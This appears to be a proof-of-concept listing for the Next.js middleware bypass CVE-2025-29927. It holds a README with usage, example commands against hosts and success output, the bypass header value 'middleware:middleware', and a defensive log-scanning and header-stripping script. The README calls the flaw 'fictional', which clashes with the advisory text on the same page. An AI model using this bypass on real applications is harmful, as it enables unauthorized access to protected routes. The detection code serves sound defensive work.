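PoC details: c29cf6446cc91ea0af1012f4d76c707ad9dac025

Source
Related vulnerability
Title: Next.js security vulnerability (CVE-2025-29927)
Description: Next.js is a React framework open-sourced by Vercel. Next.js versions before 14.2.25 and versions before 15.2.3 contain a security vulnerability: if the authorization check takes place in middleware, that check can be bypassed.
Description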
> 🔓 Proof-of-Concept for a fictional Next.js middleware bypass (CVE-2025-29927) — craft sub-requests to test protected routes.
Introduction
# PoC for Next.js Middleware Bypass (CVE-2025-29927)

This is a **proof-of-concept** for a **fictional** Next.js middleware bypass vulnerability (CVE-2025-29927). Use **only** for educational and authorized security research.

---

## 🚀 Features

| Feature             | Description                                                       |
| ------------------- | ----------------------------------------------------------------- |
| ✨ Color & Verbose   | Color-coded output; `-v` for detailed debug logs.                 |
| 📦 OOP Structure    | Class-based design for clarity and maintainability.               |
| 🌐 Proxy Support    | Route traffic through HTTP(S) proxies via `--proxy`.              |
| 🍪 Session Handling | Persistent `requests.Session` for cookies & connection reuse.     |
| 🚦 Redirect Control | No-follow-redirect by default; clearly detects pass vs. fail.     |
| 🛠 Custom Headers   | Override `User-Agent`, `x-middleware-subrequest`, or add headers. |

---

## ⚡ Installation

```bash
# Clone repository
git clone https://github.com/your-username/nextjs-middleware-poc.git
cd nextjs-middleware-poc

# (Optional) Create virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install dependencies
pip install -r requirements.txt
```

> **Requires** Python 3.7+

---

## 🎯 Usage

```bash
python poc.py [options] <host>[:port]
```

| Option                      | Description                                                               |
| --------------------------- | ------------------------------------------------------------------------- |
| `-p, --path PATH`           | Protected route path (default: `/admin`)                                  |
| `-s, --scheme {http,https}` | Protocol (default: `http`)                                                |
| `--header HEADER`           | `x-middleware-subrequest` header value (default: `middleware:middleware`) |
| `-ua, --user-agent AGENT`   | Custom `User-Agent` (default: `Mozilla/5.0`)                              |
| `--proxy PROXY`             | HTTP(S) proxy URL (e.g., `http://127.0.0.1:8080`)                         |
| `-v, --verbose`             | Enable debug output                                                       |
| `-h, --help`                | Show this help message                                                    |

---

## 🔍 Examples

### 1. Basic Test

```bash
python poc.py localhost:3000
```

### 2. HTTPS & Custom Path

```bash
python poc.py example.com -s https -p /dashboard
```

### 3. Proxy & Verbose

```bash
python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v
```

---

## ✅ Expected Output

**Success**

```
[*] Target URL: http://localhost:3000/admin
[+] SUCCESS: Middleware bypassed — access granted!
--- Response Snippet ---
<!DOCTYPE html><html>…<title>Admin Panel</title>…
```

**Failure**

```
[*] Target URL: http://localhost:3000/admin
[-] FAIL: Access denied by middleware (302 Redirect)
```

---
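
A defender-side companion to the README above, added here and not part of the PoC repository or of Next.js: it flags logged client requests that carry the `x-middleware-subrequest` header, drops that header before a request is forwarded, and checks a version string against the fixed releases named in the advisory text. The JSON-lines log format, the field names and the function names are assumptions made for this example, the sample records are constructed, and pre-release suffixes are ignored by the version check.

```python
import json

# Header name taken from the PoC's --header option on this page.
SUBREQUEST_HEADER = "x-middleware-subrequest"
# First fixed releases per the advisory text on this page, keyed by major version.
FIXED = {14: (14, 2, 25), 15: (15, 2, 3)}

# Constructed sample: JSON-lines records in a hypothetical edge-proxy log format.
SAMPLE_LOG = """\
{"src": "203.0.113.7", "path": "/admin", "status": 200, "headers": {"X-Middleware-Subrequest": "middleware:middleware"}}
{"src": "203.0.113.7", "path": "/admin", "status": 302, "headers": {"User-Agent": "Mozilla/5.0"}}
{"src": "198.51.100.4", "path": "/dashboard", "status": 302, "headers": {"x-middleware-subrequest": "middleware"}}
not a json line
"""

def is_affected(version):
    """True/False for the 14.x and 15.x lines; None where the page names no fixed release."""
    parts = tuple(int(p) for p in version.split("-")[0].split(".")[:3])
    fixed = FIXED.get(parts[0])
    return None if fixed is None else parts < fixed

def strip_subrequest_header(headers):
    """Copy of headers without the internal header, matched case-insensitively."""
    return {k: v for k, v in headers.items() if k.lower() != SUBREQUEST_HEADER}

def find_subrequest_requests(log_text):
    """Flag client requests that carried the header; a 2xx reply means it was served."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the scan
        if not isinstance(rec, dict):
            continue
        values = [v for k, v in rec.get("headers", {}).items()
                  if k.lower() == SUBREQUEST_HEADER]
        if values:
            served = 200 <= rec.get("status", 0) < 300
            findings.append({"line": lineno, "src": rec.get("src"),
                             "path": rec.get("path"), "value": values[0],
                             "verdict": "served" if served else "refused"})
    return findings

if __name__ == "__main__":
    for finding in find_subrequest_requests(SAMPLE_LOG):
        print(finding)
    print(is_affected("14.2.24"), is_affected("15.2.3"), is_affected("13.5.0"))
```

A "served" verdict on a protected path corresponds to the PoC's success case, and "refused" to its 302 failure case.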
File snapshot

```
[4.0K] /data/pocs/c29cf6446cc91ea0af1012f4d76c707ad9dac025
├── [5.3K] poc.py
└── [3.1K] README.md

0 directories, 2 files
```